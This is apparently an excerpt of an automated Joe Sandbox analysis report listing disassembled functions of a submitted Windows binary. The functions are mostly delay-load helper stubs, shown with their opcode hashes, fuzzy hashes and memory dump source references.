    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d6f40d4656cbfc92aa934aaa907fd5bf4b98d462df7f6803dd5409127e96a604
    • Instruction ID: 8f8fe90f4b06be0488b69130d504a8cf0cfe7a6af8adcc37449a25c2900126e7
    • Opcode Fuzzy Hash: d6f40d4656cbfc92aa934aaa907fd5bf4b98d462df7f6803dd5409127e96a604
    • Instruction Fuzzy Hash: F8B0128536A4037C33C461547D16E3B022EC7C0B23330803FF807CC041D88C0E092032
    Function 0005F3E0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: f70bca872958eed095adf016ea78ed438a9d6237e504885d57ab64c8496d335f
    • Instruction ID: 14b94daa614e925cfea1d78e069acc246aad6324233fbc5e6be09f427952bb26
    • Opcode Fuzzy Hash: f70bca872958eed095adf016ea78ed438a9d6237e504885d57ab64c8496d335f
    • Instruction Fuzzy Hash: 75B012852794037C73C461547C12E3B026EDBC0B23370803FF807C8041D84C0D082032
    Function 0005F3EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0f014e090e69919a1afff7dd9432d7dcc102efdaf7ab58f2065a0f8119bf6ad0
    • Instruction ID: 952e34db80fb148cb447cc7c51746bd538171ff316e64a346a453b805265aaf3
    • Opcode Fuzzy Hash: 0f014e090e69919a1afff7dd9432d7dcc102efdaf7ab58f2065a0f8119bf6ad0
    • Instruction Fuzzy Hash: 26B012852684037C338461647C02E7F026DC7C1B13330C03FFD07C4042D84C0D092032
    Function 0005F3F4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9f8e2dc70ead11fe2aa7227d9c7c2d3c6fdeb0ef0eedc1ca1c6a7ffd5183dfc0
    • Instruction ID: 9d4d2db4b18c347589fb94b848b8b4838fbae229866e6c1d09c435bc31db756c
    • Opcode Fuzzy Hash: 9f8e2dc70ead11fe2aa7227d9c7c2d3c6fdeb0ef0eedc1ca1c6a7ffd5183dfc0
    • Instruction Fuzzy Hash: 03B012852686037C33C461547C02E7F026DC7C0B13330813FF807C4041D84C0D482032
    Function 0005F3FE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 33c3c9785b427c1bc275a914dd8782b9d8308a644bd0d9435e51b91e08f736d1
    • Instruction ID: b3cc06421512ce8fdc2e8a35977da4031022e6ad50852b10b1796b0e58dbf29d
    • Opcode Fuzzy Hash: 33c3c9785b427c1bc275a914dd8782b9d8308a644bd0d9435e51b91e08f736d1
    • Instruction Fuzzy Hash: 3EB012A53684037C338461547D02E7F02ADC7C0B13730803FF807C8041D88C0E092032
    Function 0005F408 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9c696704364f3575fbe33c4d87064e179a507766de083f32b7df84d4cc18f1db
    • Instruction ID: 3336db40088f55a24435789591807f5c696344198c42b2770b8c4ab02a7f2cf5
    • Opcode Fuzzy Hash: 9c696704364f3575fbe33c4d87064e179a507766de083f32b7df84d4cc18f1db
    • Instruction Fuzzy Hash: 6FB012862684037C338461547C02E7F026DD7C0B13370813FF807C4041E84C0D082032
    Function 0005F412 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 5eb89158da5a9b489a5f4a0daecf110d75c4cfb0d5c7eb2c68fa6795475ff487
    • Instruction ID: 7aa19fba1eda5b1b2845f7cbb79f6dd8e2e6979756fa3998a8c9a422493fcdde
    • Opcode Fuzzy Hash: 5eb89158da5a9b489a5f4a0daecf110d75c4cfb0d5c7eb2c68fa6795475ff487
    • Instruction Fuzzy Hash: 34B092852688036C339461546C02A3B0229D781B12330812FB906C4042D84809492032
    Function 0005F41C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: e82bc350226c43bd0a9bc043410b52e83457f02e7a322483ba6092c29ab40003
    • Instruction ID: 73d4c47ecb8e146cb7df8a1fbb5526544e57f8aa412744e09f53d7595ce2b93b
    • Opcode Fuzzy Hash: e82bc350226c43bd0a9bc043410b52e83457f02e7a322483ba6092c29ab40003
    • Instruction Fuzzy Hash: A9B092856689037C339461546C02A3B0229D780B12330822FB906C4041D8480D482072
    Function 0005F563 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d3669fb0c5b1a1713930fc31bdd3314accf5ef1007f11481d634b82b6911d2d3
    • Instruction ID: 7ded029621a1edb73fd115e15057eed5c0dc884af7b9af94f6cf8fa8590e3515
    • Opcode Fuzzy Hash: d3669fb0c5b1a1713930fc31bdd3314accf5ef1007f11481d634b82b6911d2d3
    • Instruction Fuzzy Hash: 32B012C12A8A037E334465987C02D3B019CCBC4B73330853BF906C5481E98C4C4D1072
    Function 0005F56D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: be2a82634d70bf757f76890f72df93592b6578c337118c4b985b63b2e68edd1c
    • Instruction ID: 750d23aed69d7269be2f215731617221c0cbe7c586440791ca85032a9d851c5b
    • Opcode Fuzzy Hash: be2a82634d70bf757f76890f72df93592b6578c337118c4b985b63b2e68edd1c
    • Instruction Fuzzy Hash: F5B012C12E89037E324465987C12E3B015CD7C4B73330843BF906C5481E88C4C0D1172
    Function 0005F595 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: d7f817ac72671c41b1c47d5f6c72f159baf6e4d4a94b4635f0bfec5a900c06c6
    • Instruction ID: 42cc4df4ef467c68110d2640831abfbbdf2b8f321f4833eb4565204124edb91a
    • Opcode Fuzzy Hash: d7f817ac72671c41b1c47d5f6c72f159baf6e4d4a94b4635f0bfec5a900c06c6
    • Instruction Fuzzy Hash: 28B012C12B8C037E32446598BC12E3B015CD7C8B73330863BF906C5081E84C5C0D1076
    Function 0005F689 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a09de431664efa95d8c55735df2262dba91c968d1ad53b3f566a2a04d9c056f0
    • Instruction ID: fc9e6a63eea48c1ef59168dde0f82518c90cb0ab14bbe6afa2c4c8093ccd9b8e
    • Opcode Fuzzy Hash: a09de431664efa95d8c55735df2262dba91c968d1ad53b3f566a2a04d9c056f0
    • Instruction Fuzzy Hash: 45B092852A86027C22042150AE02C3B011DCB84B12330803BFA06D84829898080910B6
    Function 0005F6A4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 74b0d9ec52659cdc94c1c3bd553d51a63574f938f4029d8433e1251ab9321d84
    • Instruction ID: a1381cf8316126d05e9c562a7e1023ea5ba3f45f93f3c1cd0d13090443479c2f
    • Opcode Fuzzy Hash: 74b0d9ec52659cdc94c1c3bd553d51a63574f938f4029d8433e1251ab9321d84
    • Instruction Fuzzy Hash: 3CB012813B8503BC334461646D03D3B011DCBC8F13330813BF806C41C2D88C0C4C11B2
    Function 0005F6AE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 832c05ca6fdff3fe41678e8167e091b08b1efafc061a11673736552531762a02
    • Instruction ID: feedc1ad93f2676415ffdc428000792486bdaaf06a7232d2a71b7b556f7e7384
    • Opcode Fuzzy Hash: 832c05ca6fdff3fe41678e8167e091b08b1efafc061a11673736552531762a02
    • Instruction Fuzzy Hash: E5B092812A8402AC224461646E02D3B011DD788B12330803BF906C80829888080911B2
    Function 0005A235 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • DestroyWindow.USER32(?,00000000,0005E640,?,?,00000001,?,?,0005C999,000760F0,000A1CF0,000A1CF0,00001000,?,00000000,?), ref: 0005A241
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: de6c185696efd7b77323bbe2f89271d6b4c1f1d2a5b8abe15a19a5fd2870a6fc
    • Instruction ID: 6af37ac62c9f95d9838bc4dadc5eef4ea9e7e15cdb289e454e783dd49e5472fa
    • Opcode Fuzzy Hash: de6c185696efd7b77323bbe2f89271d6b4c1f1d2a5b8abe15a19a5fd2870a6fc
    • Instruction Fuzzy Hash: 42C08C31011B208BD7310B08EA0939276E0BB05B13F00C82D90964646083B5A884CA40
    Function 0005F363 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F32D
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6f5e0afea8be073e11fee1fe5b03fd2e88191d043b5451f94df9fda75508e33d
    • Instruction ID: 31372f444546e02e1b3a61088f9a6e598b3e4e6aa6fce552a91a70216af2ccb9
    • Opcode Fuzzy Hash: 6f5e0afea8be073e11fee1fe5b03fd2e88191d043b5451f94df9fda75508e33d
